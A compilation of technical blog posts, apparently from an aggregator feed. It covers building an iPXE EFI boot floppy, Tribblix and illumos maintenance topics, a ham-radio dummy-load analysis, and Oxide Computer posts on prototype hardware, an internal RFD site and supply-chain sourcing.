Difficult Hardware Nahum Shalman

This content can also be found as part of https://github.com/tinkerbell/ipxedust/pull/88 in DifficultHardware.md.

Most modern hardware is capable of PXE booting just fine. Sometimes strange combinations of different NIC hardware / firmware connected to specific switches can misbehave.

In those situations you might want to boot into a build of iPXE but completely sidestep the PXE stack in your NIC firmware.

We already ship ipxe.iso that can be used in many situations, but most of the time that requires either an active connection from a virtual KVM client or network access from the BMC to a storage target hosting the ISO.

Some BMCs support uploading a floppy image into BMC memory and booting from that. To support that use case we have started packaging our EFI build into a bootable floppy image that can be used for this purpose.

For other projects or use cases that wish to replicate this functionality, with the appropriate versions of qemu-img, dosfstools and mtools you can build something similar yourself from upstream iPXE like so:

# create a 1440K raw disk image
qemu-img create -f raw ipxe-efi.img 1440K
# format it with an MBR and a FAT12 filesystem
mkfs.vfat --mbr=y -F 12 -n IPXE ipxe-efi.img

# Create the EFI expected directory structure
mmd -i ipxe-efi.img ::/EFI
mmd -i ipxe-efi.img ::/EFI/BOOT

# Copy ipxe.efi as the default x86_64 efi boot file
curl -LO https://boot.ipxe.org/ipxe.efi
mcopy -i ipxe-efi.img ipxe.efi ::/EFI/BOOT/BOOTX64.efi

As of writing other projects are working on automating the upload
of this floppy to a BMC.
See draft PR https://github.com/bmc-toolbox/bmclib/pull/347

Retiring isaexec in Tribblix The Trouble with Tribbles...

One of the slightly unusual features in illumos, and Solaris because that's where it came from, is isaexec.

This facility allows you to have multiple implementations of a binary, and then isaexec will select the best one (for some definition of best).

The full implementation allows you to select from a wide range of architectures. On my machine it'll allow the following list:

amd64 pentium_pro+mmx pentium_pro
pentium+mmx pentium i486 i386 i86

If you wanted, you could ship a highly tuned pentium_pro binary, and eke out a bit more performance.

The common case, though, and it's actually the only way isaexec is used in illumos, is to simply choose between a 32-bit and 64-bit binary. This goes back to when Solaris and illumos supported 32-bit and 64-bit hardware in the same system (and you could actually choose whether to boot 32-bit or 64-bit under certain circumstances). In this case, if you're running a 32-bit kernel you get a 32-bit application; if you're running 64-bit then you can get the 64-bit version of that application.

Not all applications got this treatment. Anything that needed to interface directly with the kernel did (eg the ps utility). And for others it was largely about performance or scalability. But most userland applications were 32-bit, and still are in illumos. (Solaris has migrated most to 64-bit now, we ought to do the same.)

It's been 5 years or more since illumos removed the 32-bit kernel, so the only option is to run in 64-bit mode. So now, isaexec will only ever select the 64-bit binary.

A while ago, Tribblix simply removed the remaining 32-bit binaries that isaexec would have executed on a 32-bit system. This saved a bit of space.

The upcoming m32 release goes further. In almost all cases isaexec is no longer involved, and the 64-bit binary sits directly in the PATH (eg, in /usr/bin). There's none of the wasted redirection. I have put symbolic links in, just in case somebody explicitly referenced the 64-bit path.

This is all done by manipulating packaging - Tribblix runs the IPS package repo through a transformation step to produce the SVR4 packages that the distro uses, and this is just another filter in that process.

(There are a handful of exceptions where I still have 32-bit and 64-bit. Debuggers, for example, might need to match the bitness of the application being debugged. And the way that sh/ksh/ksh93 is installed needs a slightly less trivial transformation to get it right.)

Modernizing scripts in Tribblix The Trouble with Tribbles...

It's something I've been putting off for far too long, but it's about time to modernize all the shell scripts that Tribblix is built on.

Part of the reason it's taken this long is the simple notion of, if it ain't broke, don't fix it.

But some of the scripting was starting to look a bit ... old. Antiquated. Prehistoric, even.

And there's a reason for that. Much of the scripting involved in Tribblix is directly derived from the system administration scripts I've been using since the mid-1990s. That involved managing Solaris systems with SVR4 packages, and when I built a distribution derived from OpenSolaris, using SVR4 packages, I just lifted many of my old scripts verbatim. And even new functionality was copied or slightly modified.

Coming from Solaris 2.3 through 10, this meant that they were very strictly Bourne Shell. A lot of the capabilities you might expect in a modern shell simply didn't exist. And much of the work was to be done in the context of installation (i.e. Jumpstart) where the environment was a little sparse.

The most obvious code smell is extensive use of backticks rather than $(). Some of this I've refactored over time, but looking at the code now, not all that much.

One push for this was adding ShellCheck to Tribblix (it was a little bit of a game getting Haskell and Cabal to play nice, but I digress).

Running ShellCheck across all my scripts gave it a lot to complain about. Some of the complaints are justified, although many aren't (it's very enthusiastic about quoting everything in sight, even when that would be completely wrong).

But generally it's encouraged me to clean the scripts up. It's even managed to find a bug, although looking at code it thinks is just rubbish has found a few more by inspection.

The other push here is to speed things up. Tribblix is often fairly quick in comparison to other systems, but it's not quick enough for me. But more of that story later.

Scribbled Dummy Load Blueprints Josef "Jeff" Sipek

Yesterday, I saw KM1NDY’s blog post titled Scribbled Antenna Blueprints. I wasn’t going to comment…but here I am. :)

I thought I’d setup up a similar contraption (VHF instead of HF) to see what exactly happens. I have a 1 meter long RG-8X jumper with BNC connectors, a BNC T, and a NanoVNA with a 50Ω load calibration standard.

But first, let’s analyze the situation!

Imagine you have a transmitter/signal generator and you connect it to a dummy load. Assuming ideal components, absolutely nothing would get radiated. Now, imagine inserting an open stub between the two. In other words, the T has the following connections:

  1. the generator
  2. 50Ω load
  3. frequency-dependant impedance

Let’s do trivial math! Let’s call the total load that the generator sees Z total and the impedance provided by the stub Z stub . The generator side of the T is connected to the other ports in parallel. Therefore:

Z total = 50 * Z stub 50 + Z stub

So, when would we get a 1:1 SWR? When the generator sees a 50Ω load. When will it see 50Ω? When Z stub is very large; the extreme of which is when that side of the T is open.

If you are a ham, you may remember from when you were studying for the Amateur Extra exam that transmission line stubs can transform impedance. A 1/2 wave stub “copies” the impedance. A 1/4 wave stub “inverts” the impedance. For this “experiment” we need a high impedance. We can get that by either:

  1. open 1/2 wave stub
  2. shorted 1/4 wave stub

Since the “design” from the scribble called for an open, we’ll focus on the 1/2 wave open stub.

Now, back to the experiment. I have a 1 m long RG-8X which has a velocity factor of 0.78. So, let’s calculate the frequency for which it is a 1/2 wave—i.e., the frequency where the wavelength is 2 times the length of the coax:

f = 0.78 * c / 2 m

This equals 116.9 MHz. So, we should expect 1:1 SWR at 117-ish MHz. (The cable is approximately 1 m long and the connectors and the T add some length, so it should be a bit under 117.)

Oh look! 1.015:1 SWR at 110.5 MHz.

(Using 1.058 m in the calculation yields 110.5 MHz. I totally believe that between the T and the connectors there is close to 6 cm of extra (electrical) length.)

But wait a minute, you might be saying, if high impedance is the same as an open, couldn’t we just remove the coax stub from the T and get the same result? Yes! Here’s what the NanoVNA shows with the coax disconnected:

The SWR is 1.095:1 at 110.5 MHz and is better than 1.2:1 across the whole 200 MHz! And look at that impedance! It’s about 50Ω across the whole sweep as well!

We can simplify the circuit even more: since we’re only using 2 ports of the T, we can take the T out and connect the 50Ω load to the NanoVNA directly. We just saved $3 from the bill of materials for this “antenna”!

(In case it isn’t obvious, the previous two paragraphs were dripping with sarcasm, as we just ended up with a dummy load connected to the generator/radio and called it an antenna.)

Will It Antenna?

How could a dummy load transmit and receive signals? Glad you asked. In the real world we don’t use ideal components. There are small mismatches between connectors, the characteristic impedance of the coax is likely not exactly 50Ω, the coax shield is not quite 100%, the transmitter’s/generator’s output isn’t exactly 50Ω, and so on.

However, I expect all these imperfections do not amount to anything that will turn this contraption into an antenna. I bet that the ham that suggested this design used an old piece of coax which had even worse characteristics than the “within manufacturing tolerances” specs you get when the coax is new. Another option is that the coax is supposed to be connected in some non-standard way. Mindy accidentally found one as she was packing up when she disconnected the shield but not the center conductor. Either way, this would make the coax not a 1/2 wave open stub, and the resulting impedance mismatch would cause the whole setup to radiate.

I’d like to thank Mindy for posting about this design. It provided me with a fun evening “project” and a reason to write another blog post.

Finally, I’ll leave you with a photo of my experimental setup.

Speed up zone installation with this one weird trick The Trouble with Tribbles...

Sadly, the trick described below won't work in current releases of Solaris, or any of the illumos distributions. But back in the day, it was pretty helpful.

In Solaris 10, we had sparse root zones - which shared /usr with the global zone, which not only saved space because you didn't need a copy of all the files, but creating them was much quicker because you didn't need to take the time to copy all the files.

Zone installation for sparse root zones was typically about 3 minutes for us - this was 15 years ago, so mostly spinning rust and machines a bit slower than we're used to today.

That 3 minutes sounds quick, but I'm an impatient soul, and so were my users. Could I do better?

Actually, yes, quite a bit. What's contributing to that 3 minutes? There's a bit of adding files (the /etc and /var filesystems are not shared, for reasons that should be fairly obvious). And you need to copy the packaging metadata. But that's just a few files.

Most of the time was taken up by building the contents file, which simply lists all the installed files and what package they're in. It loops over all the packages, merging all the files in that package into the contents file, which thus grows every time you process a package.

The trick was to persuade it to process the packages in an optimal order. You want to do all the little packages first, so that the contents file stays small as long as possible.

And the way to do that was to recreate the /var/sadm/pkg directory. It was obvious that it was simply reading the directory and processing packages in the order that it found them. And, on ufs, this is the order that the packages were added to the directory. So what I did was move the packages to one side, create an empty /var/sadm/pkg, and move the package directories back in size order (which you can get fairly easily by looking as the size of the spooled pkgmap files).

This doesn't quite mean that the packages get processed in size order, as it does the install in dependency order, but as long as dependencies are specified it otherwise does them in size order.

The results were quite dramatic - with no other changes, this took zone install times from the original 3 minutes to 1 minute. Much happier administrators and users.

This trick doesn't work at all on zfs, sadly, because zfs doesn't simply create a linear list of directory entries and put new ones on the end.

And all this is irrelevant for anything using IPS packaging, which doesn't do sparse-root zones anyway, and is a completely different implementation.

And even in Tribblix, which does have sparse-root zones like Solaris 10 did, and uses SVR4 packaging, the implementation is orders of magnitude quicker because I just create the contents file in a single pass, so a sparse zone in Tribblix can install in a second or so.

Remnants of closed code in illumos The Trouble with Tribbles...

One of the annoying issues with illumos has been the presence of a body of closed binaries - things that, for some reason or other, were never able to be open sourced as part of OpenSolaris.

Generally the illumos project has had some success in replacing the closed pieces, but what's left isn't entirely zero.It took me a little while to work out what's still left, but as of today the list is:


Actually, this isn't much. In terms of categories:

Trusted, which includes those label_encodings, and labeld. Seriously, nobody can realistically run trusted on illumos (I have, it's ... interesting). So these don't really matter.

The iconv files actually go with the closed iconv binary, which we replaced ages ago, and our copy doesn't and can't use those files. We should simply drop those (they will be removed in Tribblix next time around).

There's a set of files connected to IKE and IPSec. We should replace those, although I suspect that modern alternatives for remote access will start to obsolete all this over time.

The scsi_vhci files are to get multipathing correctly set up on some legacy SAN systems. If you have to use such a SAN, then you need them. If not, then you're in the clear.

There are a number of drivers. These are mostly somewhat aged. The sdp stuff is being removed anyway as part of IPD29, so that'll soon be gone. Chances are that very few people will need most of these drivers, although mpt was fairly widely used (there was an open mpt replacement in the works). Eventually the need for the drivers will dwindle to zero as systems with them in no longer exist (and, by the same token, we wouldn't need them for something like an aarch64 port).

Which just leaves 2 commands.

Realistically, the XPG4 more could be replaced by less. The standard was based on the behaviour of less, after all. I'm tempted to simply delete /usr/xpg4/bin/more and make it a link to less and have done with it.

As for pax, it's required by POSIX, but to be honest I've never used it, haven't seen anywhere that uses it, and read support is already present in things like libarchive and gtar. The heirloom pax is probably more than good enough.

In summary, illumos isn't quite fully open source, but it's pretty close and for almost all cases we could put together a fully functional open subset that'll work just fine.

Static Site Generators The Trouble with Tribbles...

The current Tribblix website is a bit of a hack. Technically it's using a static site generator - a simple home-grown script that constructs pages from a bit of content and boilerplate - but I wanted to be able to go a bit further.

I looked at a few options - and there are really a huge number of them - such as Hugo and Zola. (Both are packaged for Tribblix now, by the way.)

In the end I settled on nanoc. That's packaged too (and I finally got around to having a very simple - rather naive - way of packaging gems).

Why nanoc, though? In this case it was really because it could take the html page fragments I already had and create the site from those, and after tweaking it slightly I end up with exactly the same html output as before.

Other options might be better if I was starting from scratch, but it would have been much harder to retain the fidelity of the existing site.

One advantage of the new system is that I can put the site under proper source control, so the repo is here.

There's still a lot of work to be done on filling out the content, but it should be easier to evolve the Tribblix website in future.

Building Big Systems with Remote Hardware Teams Oxide Computer Company Blog

The product we’re building, a rack-scale computer, is specifically designed to be a centralized, integrated product because that’s what our customers need. This requirement and the design choices we’ve made to meet this need create some daily efficiency challenges for our team. As a remote-first company, we’re designing this product with team members (including the hardware team) across most North American time zones and even multiple continents, so a large portion of our team is not going into the office/lab every day for hands-on access to "production" hardware. At first blush, the design of our product and the design of our team appear to conflict at some level: we value remote work, but we can’t ship entire racks to the homes of our teammates for both practical and economic reasons.

Our racks are rather inconvenient for a home installation: over 2.3 m (7.7') tall, very heavy, and have 3-phase power inputs that aren’t usable in a typical residential setting. Aside from the logistical challenges of a home installation, there’s also the actual cost: these are expensive, and outfitting each remote team member with a full, or even partially populated, rack is economically infeasible. Further, a racked target is not terribly useful for development, as accessing them for debugging is challenging: we have no externally accessible debugging interfaces or other things that can be repurposed as such because our customers don’t want that stuff! We can (and do!) travel some to get hands-on with a full system, but it became clear early on in the development cycle that we needed more convenient ways of being productive remotely.

Remote productivity on this design is a multi-faceted problem and the solution includes robust remote access to fully-built and partially built systems back at HQ, but that alone does not address all the needs.

This post will deal more with the philosophy we have developed around our non-product board designs as we’ve learned what works for us on our journey through remote development. Some of these tools have become pivotal in increasing our remote efficiency, especially early in the design cycle when the "real" systems weren’t very functional and remote accessibility was limited. For more board-by-board specifics, check out a great Oxide and Friends episode where we talked through the genesis of many of these designs. With many of our team members who designed these boards on-hand, it was a great discussion and a lot of fun talking about the role prototypes have played in facilitating our actual product design.

Not a distraction from "real" product design

We fully believe that these small designs, most of which end up taking around a week of engineering time to design, have radically accelerated or augmented our "real" product designs. I detail a couple of specific examples of how this prototype hardware helped us, from enabling software work before any "real" hardware existed, to prototyping circuits like our multiplexed QSPI flash design. Specifically for the QSPI design, the initial circuit just did not work like we expected and using these boards we were able to quickly (and inexpensively!) iterate on the design, directly informing the work on our "real" designs, and in this case, likely saving a spin of our production hardware that wouldn’t have worked. We were even able to connect our SPI mux to extant development hardware from AMD and validate our assumptions before building a server sled. The Oxide and Friends episode mentioned above covers some of these and other stories in more detail.

Our team fully embraces toolmaking up and down the stack: it informs many of our design choices and directions. Bryan recently gave a talk on the concept, and this is yet another application of it. Just like software teams build tools to help build software, we’re building hardware tools to help build hardware and software.

To emphasize how pervasive this culture is in our company, Dan made a great point during the Oxide and Friends chat:

Anyone in the company is empowered to do this.

We don’t need approval or sign-off, we just go do what’s right for Oxide, and I think this quote from Aaron really sums up our team’s viewpoint:

Investments in tools pay off long-term and often faster than you’d think!

We’ve seen time and time again the effort put into these small boards has paid back big dividends in team productivity, development ease, and bug chasing.

Why we needed custom hardware vs off-the-shelf development boards

There are multiple aspects to our need for custom hardware. First, the custom designs supplement our use of off-the-shelf (OTS) hardware. We use many off-the-shelf development boards and even provide support for a number of these boards in Hubris. These are great for many use-cases, but less great when we are trying to model specific circuits or subsystems of our product designs. Second, we have numerous examples of custom boards that were built simply because we could find no useful OTS alternative: boards like the Dimmlet (I2C access to DDR4 SPD EEPROMs) and the K.2 (U.2 → PCIEx4 CEM breakout) fall into this category.

Narrow PMOD-interface board for interfacing with the SPD EEPROMs on the two installed DDR4 DIMMs
Figure 1. Narrow PMOD-interface board for interfacing with the SPD EEPROMs on the two installed DDR4 DIMMs
PCIe U.2 connector to PCIe x4 CEM connector extender board
Figure 2. PCIe U.2 connector to PCIe x4 CEM connector extender board

Thriftiness in practice

While this strategy of developing prototypes touches on many Oxide values (as discussed below), Thriftiness deserves special attention. Making inexpensive hardware has never been easier! Quick-turn PCB houses, both offshore and onshore, have achieved incredibly low cost while maintaining high quality. We had 50 K.2r2 PCBs with impedance control and a framed stencil fabricated for <$400USD. For something so simple (BOM count <10 parts) we built these in-house using an open-source pick and place machine (Lumen PNP from Opulo), and a modified toaster oven with a Controleo3 controller. We’ve also done hot-plate reflow and hand assembly. And while we will outsource assembly when it makes sense due to complexity or volume, for these simple, low volume designs, we see real benefits in self-building: we can build as few or as many as we want, do immediate bring-up and feed any rework directly into the next batch, and there’s no overhead in working with a supplier to get kitted parts there, quotes, questions etc. A good example of this was on the Dimmlet: I messed up the I2C level translator circuit by missing the chip’s requirements about which side was connected to the higher voltage. Since I was hand-assembling these, I built one, debugged it, and figured out the rework required to make it function. Since this rework included flipping the translator and cutting some traces, catching this issue on the first unit made reworking the remaining ones before going through assembly much easier.

All of that to say, the cost of building small boards is really low. A single prototype run that saves a "real" board re-spin pays for itself immediately. Enabling software development before "real" hardware lands pays for itself immediately. Even when things don’t work out, the cost of failure is low; we lost a few hundred dollars and some engineering time, but learned something in the process.

Because of this low cost, we can use a "looser" design process, with fewer tollgates and a less formal review/approval process. This lowers the engineering overhead required to execute these designs. We can have more informal reviews, a light-weight (if any) specification and allow design iteration to happen naturally. Looking at the designs, we have multiple examples of design refinement like the K.2r2 which improved on the electrical and mechanical aspects of the original K.2, and a refinement to the sled’s bench power connector boards resulting in a more compact and ergonomic design that improves mating with sleds in their production sheet metal.

Experience and the evolution of our strategy

Early in our company’s history, the team built out a development platform, named the Gemini Bring-up board, representing the core of the embedded design for our product-- our Gemini complex (Service Processor + Root of Trust
Management Network plane). The resulting platform was a very nice development tool, with hilarious silkscreen and some awesome ideas that have continued informing current and future designs, but we rapidly outgrew this first design. While the major choices held, such as which microcontrollers are present, the still-nebulous design of the actual product, and subsequent design iteration, left the periphery of the bring-up board bearing little resemblance to the final Gemini complex design. The changes came from a variety of unforeseen sources: the global chip shortage forced BOM changes and a better understanding of the constraints/needs of our product necessitated architecture changes, resulting in further drift between this platform and what we intended to implement in the product.

First custom Oxide hardware with SP
Figure 3. First custom Oxide hardware with SP and RoT

A re-imagining of what would be most useful gave way to the Gimletlet, a major work-horse for in-house development, designed (and initially hot-plate reflowed) by Cliff. The Gimletlet is essentially a development board using the STM32H7 part that we’re using as our Service Processor (SP) in our product. It provides power and basic board functionality including a couple of LEDs, and a dedicated connector for a network breakout card, and breaks out most of the remaining I/O to PMOD-compatible headers. This choice has been key to enabling a very modular approach to prototyping, recognizing that less is more when it comes to platforms. The Gimletlet design means that we can build purpose-built interface cards without needing to worry about network connectivity or processor support, simplifying the design of the interface cards and able to share a core board support package.

Custom STM32H7 board with I/O breakout to many PMOD interfaces
Figure 4. Custom STM32H7 board with I/O breakout to many PMOD interfaces

Our team has learned that modularity is key to making these small proto-boards successful. It does mean workspaces can get a little messy with a bunch of boards connected together, but we’ve found this to be a good balance, allowing our team members to cobble together a small, purpose-built system that meets their specific needs, and allows us to easily share these common, low-cost setups to our distributed team. The modularity also means that storing them is relatively easy as they can be broken down and stashed in small boxes.

Gimletlet with Igntionlet
Figure 5. Gimletlet with Igntionlet, SPI MUx, Dimmlet, RoTCarrierCarrier, and RoTCarrier connected

Our values tie-ins

There are some obvious values tie-ins like teamwork and thriftiness as already mentioned, but as I started writing this section I realized we hit more of our values than I had even realized. Rather than attempt to enumerate each one, I wanted to hit on some maybe less-obvious ones:

  • Humor: The silkscreens on our boards contain jokes, word-play and other silliness because we enjoy making our co-workers laugh and want our work to be fun too. The funny silkscreen is often snuck in post-review, and thus a surprise to co-workers as they open the finished hardware. Engineering demands creativity — I’ve worked at places where silliness baked into a board would be frowned upon, but at Oxide it is supported and even encouraged! This enables team members to bake a little bit of their personality into these designs, while allowing the rest of the team to have fun as it’s discovered.

Gemini Bring up board with silkscreen riffing on Root of Trust vs Route of Trust vs Newt of Trust as well as pointing out the untrustworthiness of vendor boot ROMs
Figure 6. Preview of Gemini Bring up board
  • Rigor/Urgency: We often find Rigor and Urgency in tension with each other, but in this case, they are complementary. The time from concept to ordering of a PCB on some of these designs is measured in hours or days, not weeks. Being able to move quickly from a paper concept to a physical manifestation of that concept in real hardware has been instrumental in grounding our assumptions and informing our designs. We’re able to quickly iterate in areas where we have questions, driving resolution without holding up the rest of the design. This work directly contributes to better architecture and circuit design decisions in our "real" designs.

  • Transparency/Responsibility/Teamwork: We believe in openness, including our own designs, so we’re opening up the various proto-board design repositories for reference and hope that something there is useful in your own hardware endeavors. These designs are things that we wished existed and so created them, some of these may be a bit specific for our use-cases, but there are some generally useful things there too. These are mostly KiCAD designs and support for them is "as-is" since we’re focused on getting our product out the door, but feel free to reach out in the repo with questions and we’ll attempt to answer on a best-effort basis.

A Tool for Discussion Oxide Computer Company Blog

At Oxide, RFDs (Requests for Discussion) play a crucial role in driving our architectural and design decisions. They document the processes, APIs, and tools that we use. The workflow for the RFD process is based upon those of the Golang proposal process, Joyent RFD process, Rust RFC (Request for Comments) process, and Kubernetes proposal process. To learn more about RFDs and their process, you can read this post.

Similar to RFCs, our philosophy of RFDs is to allow both timely discussion of rough ideas, while still becoming a permanent repository for more established ones.

Oxide RFDs are essentially a collection of AsciiDoc documents, collected in a GitHub repo. They can be quickly iterated on in a branch, discussed actively as part of a pull request to be merged, or commented upon after having been published.

Whilst a repo is a useful storage and collaboration tool, there are a number of drawbacks: it doesn’t provide the best reading experience, is limited in terms of AsciiDoc support, and is challenging to share externally. To address these issues we developed an internal RFD site. This post serves as showcase for that site and gives a brief look at some of its features.

RFD directory

Users land directly on the directory. By default it is sorted by last updated to give the user an idea of the RFDs that are actively being worked on.

RFD site homepage

Full-text search

Full-text search is powered by a self-hosted Meilisearch instance. The search index is automatically updated whenever an RFD is edited. Users can access the search function through the navigation menu or by using the hotkey CMD+K and can quickly navigate through the search results using their keyboard whilst previewing the associated RFD.

Search dialog showing results and a preview of the matched RFD

Inline PR discussion

The discussion surrounding an RFD is crucial to understanding its context, but until recently users would have to open the associated pull request in a separate tab to view its comments. To improve this experience, we’ve implemented a feature that uses the GitHub API to fetch the pull request discussion and display the comments that are still actively attached to a line alongside the part of the document they relate to.

Pop-over menu with comments that relate to the part of the document they are next to
Figure 1. Inline comments

We achieve this by using the getLineNumber function in asciidoctor.js, which allows us to map the raw line number of the comment (from the GitHub API) to the nearest block in the rendered document. While this method may not pinpoint the exact line, it is usually accurate enough.

To avoid slowing down page load times, we use the Remix deferred response feature to stream in the comments asynchronously, holding only for the critical RFD content to finish loading.

                    const rfd = await fetchRfd(num, user)
  if (!rfd) throw resp404()

  // this must not be awaited, it is being deferred
  const discussionPromise = fetchDiscussion(rfd.discussion_link, user)

  return defer({ rfd, discussionPromise })

Users can access the full discussion of an RFD at any time by opening a dialog regardless of their current location on the page. This dialog also provides the ability to jump directly to the line that is being commented on.

Dialog with a GitHub PR style timeline showing comments and snippets of the raw document
Figure 2. Full discussion

Inter-RFD linking

When an RFD document references another RFD within its content, the user can hover over the reference to see a preview of the title, authors, status, and the date of the last update. This makes it easy for users to understand the context and relationship between different RFDs, and quickly access the related documents.

Pop-over that previews the linked RFD

Jump-to menu

For users who know the title or number of the RFD they want to view, a menu can be opened by pressing CMD+/ from any page on the site. This menu allows users to quickly filter and select the desired RFD using their keyboard.

Navigation modal that shows a list of RFDs being filtered by an input


The internal tooling around RFDs is always improving, and as it does, we hope that the way we collaborate will also improve. There is still work to be done in terms of discoverability of documentation, such as adding more tools to filter and tag RFDs, and creating collections of documents. This will make it easier for new employees to get up to speed, and make it easier to manage the challenges that come with a growing team and an increasing amount of documentation. Having a better understanding of the whole stack is valuable, as it allows us to better understand the impact of our work on other parts of the product.

Additionally, we need to consider how we can make this process more accessible to everyone. Writing an RFD currently requires cloning a Git repo, running a script, committing, pushing, and making a PR. We are thinking about how to do this all through the web app with an embedded text editor. Oxide is and will continue to be an engineering-led organization, but RFDs are not just for engineers. Making it easier for everyone to create and collaborate on these documents will result in richer conversations.

Navigating Today’s Supply Chain Challenges Oxide Computer Company Blog

We’ve all experienced it. From toilet paper, exercise equipment, toys, cars, and everything in between, the supply chain during COVID has been blamed for many consumer goods shortages, and rightfully so. During lockdown, how many of us stalked our local warehouse clubs for that elusive delivery of toilet paper, scared of the implications if none was found? Or maybe you tried negotiating the price on eBay for a set of weights that was 3-4x the usual cost? Those shortages seen by the average consumer also heavily plagued electronics manufacturers and their customers as well.

Now imagine being a start-up during COVID. A start-up in the electronics industry. A start-up in competition for those highly demanded, severely constrained electronic components. A start-up with no name recognition, no history, and no relationships with manufacturers and / or distributors. Seemingly simple items like capacitors and resistors saw 20+ week lead times, with other parts advertising lead times of 52, 98, and even 104+ weeks. That’s what the supply chain looked like for Oxide in 2021, and in many component categories, still looks like today.

Our Operations Team has been hard at work since late 2020 trying to secure supply for a product that, throughout 2021 and into 2022, has continued to undergo design changes. The procurement function became a delicate balancing act taking into account lead time, cost, industry outlooks, and working closely with our engineering team regarding upcoming design changes. How much faith could we put in the demand for a given part today, when we knew an updated Bill of Materials (BOM) would be published in a few weeks? For parts with lead times that would extend past our first customer ship date, how much supply should we purchase 12-18 months ahead of schedule, knowing our design was not finalized? Working with borrowed money (literally, from our investors), we needed to quickly put in place a robust procurement system to balance the issues we faced. We needed an actionable plan that solved supply issues on many fronts. So, we did what the average consumer did during COVID; we stalked the stores (in our case, online distributors) day and night, weekdays and weekends waiting for restocks. We negotiated with suppliers, investigating whether there was additional inventory available but being held back. In some cases, being a start-up and only needing small quantities was helpful. We were able to get sample quantities of parts that would last us through our engineering build cycle. However, being a small start-up also meant we were up against the big guys. Getting recognition of our existence, let alone inventory allocated to us, was often a stressful, tedious process. What have we found that helped our team the most? Strategic supplier relationships.

There is not enough that can be said for setting up strong, trusting relationships with your suppliers. All of us on the Operations Team at Oxide have extensive backgrounds at some of the world’s top manufacturing and supply chain companies. We’ve seen and heard it all. We know the lengths many procurement professionals will go to in order to secure supply during allocations. They may inflate demand knowing their allocation quantity is based on their demand, or they may communicate required dates that are several weeks or months ahead of when the supply is actually needed. However, those responsible for the supply allocations usually realize this. When the truth comes to light, that company’s future demand is often taken with a grain of salt. It becomes difficult to trust that company again. That’s where the Oxide Ops Team differentiate ourselves. Oxide’s principles and values truly drive our everyday work. We’re firmly committed to our principles of Integrity, Honesty, and Decency, and integrate them into all of our business practices. We strive to balance our sometimes conflicting values in order to strengthen our vendor relationships. Here are a few of the Oxide values and how we showcase them in our supply chain relationships.

  • Candor — We’re upfront about our needs, including quantities and dates. As these items change, we do our best to proactively communicate those changes to our suppliers. We know there will be times we need our suppliers to jump through hoops for us, to expedite, to get supply not otherwise allocated to us. However, we also understand these should be one-off instances and not the norm. We want our supplier reps to succeed just as much as we strive for success at Oxide. Being candid helps ensure we are all set up for success.

  • Rigor — We demand a lot from ourselves, but we also demand a lot from our suppliers. If a date slips or the component quality isn’t as expected, we request our supplier proactively communicate, root cause, and implement corrective action as needed. We have a small team and we rely on our suppliers to have the same sense of rigor as we do at Oxide.

  • Teamwork — We look at the relationships with our suppliers as extended team members. We want to instill in them a sense of pride for the Oxide product, just as much as we support them and their company. Successes and failures are shared amongst everyone involved. We will not be successful at Oxide without our extended team.

  • Thriftiness – We’re a start-up with maniacally focused founders, a very involved board of directors, and limited capital. We’re building a massive product while being very cognizant of costs. Given our small size and start-up status, we rely on our relationships with our suppliers, coupled with massive amounts of internet searching and price comparing, to try and get the best costs we can. We know we’re paying more for items than the big guys, but we’re trying to close that gap as much as we can. Getting our suppliers on board with our vision, and getting them excited about the Oxide rack, is instrumental in price negotiations. We’re also sure that one day we’ll be one of those big guys. :)

Aligning ourselves with suppliers we can trust and partners invested in the success of Oxide has allowed us to successfully navigate the current supply chain conditions. Treating others with respect and kindness cannot be underestimated. Building strong relationships on an unfaltering basis of Integrity, Honesty and Decency is key. Adhering to our principles and balancing our values will continue to drive our successes.

When Allocation Hits the Fan

Allocation. A term no supply chain professional wants to hear. Even more so when you’re a start-up in a critical test phase of your new product which has yet to launch. Founders, investors, manufacturing partners and others, all anxious for an update. That timing device, tiny in size, but mighty in nature, gating your entire build process. Your product can’t run without it. There are no suitable alternates and there is no supply via your normal channels. There is, however, a large supply showing in the broker market. Over 100K. Wow, score! You may have just solved your high-profile supply constraint. Now the only thing left to decide is which of these companies will get your business.

Before you get too excited though, you need to pause, step back, and analyze the situation. Could there really be over 100K of this highly constrained part on the broker market? That $0.38 part is showing for between $1.10 and $7.08 on the broker market. How could there be that much variation? Is the higher priced part “real” while the lower priced part possibly counterfeit or stolen? What would happen if you were to receive a counterfeit part? The brokers typically all provide some sort of generic “guarantee” on their website. How bad could it be? You could order the part, have it tested, realize it’s not real and get your money back, right? Sounds easy, though it rarely is. From reading reviews of brokers, speaking with people who have had bad experiences, and my own search for broker parts, many of the broker websites are not legitimate. Embrace your inner pessimist and begin your search being wary of everyone. While there are certain countries which automatically throw up red flags, there are also plenty of US based companies I wouldn’t consider doing business with. It’s ok to be pessimistic now and then. You need to protect your company, your product, and your reputation. What sorts of issues could you face with parts purchased from a broker? You could end up with parts that have old date codes, have not been stored correctly in humidity controlled / ESD bags, damaged, or downright counterfeit. Things to look for when evaluating an online broker:

  1. Misspellings & Poor Grammar. Sure, we all make mistakes from time to time. I had to make sure “misspellings” was spelled correctly! However, a professional website should not have misspellings, blatant grammar issues or obviously poor translation.

  2. Authorized Distributor Claims. Make sure to go to the actual manufacturer’s website and look up their authorized distributors. If a broker claims they are authorized and aren’t listed, do not order anything, ever.

  3. 100% Guaranteed Claims – Authenticity, Quality, etc. Read the superfine print. Understand what is being guaranteed. A phrase such as “guaranteed to function like original part” should make you pause given use of the word “like”. Most sites seem to offer some feel-good blurb on how they’ve had the parts tested in-house or by a third-party tester and results are available. What are the qualifications of the tester? What were they testing? Some websites will even tell you they support you having the part tested. If your tests show the part is not original, you can return the part with your test data. However, reading deeper into their return policy, often found in a different section of their website, will reveal that you cannot return any part that has been opened and / or is not the full quantity ordered. Return windows may also be abnormally short, not affording you enough time to test the parts. Unfortunately for you, in order to perform a physical and electrical verification, you must open the packaging and use several for testing purposes. You have now invalidated your ability to return the part.

  4. Payment Terms – Be extremely cognizant of payment terms, types of payment accepted, and the entity you are paying. Research the payee and bank information. There are certain payment methods that are more secure and better for this type of transaction than others.

  5. Do Your Research – Spend some time reading online reviews. Take note of who / where any good reviews are coming from. Pay closer attention to the negative reviews. While it’s true more people are likely to leave a negative review than a positive review, if you see consistency in the negative reviews, it’s probably best to move along. Common negative reviews of brokers include no communication after payment sent, payment sent and part not actually in stock, payment sent and part not received, and parts do not work as expected (old date code, damaged, counterfeit). A quick search can open your eyes to a lot of questionable activities!

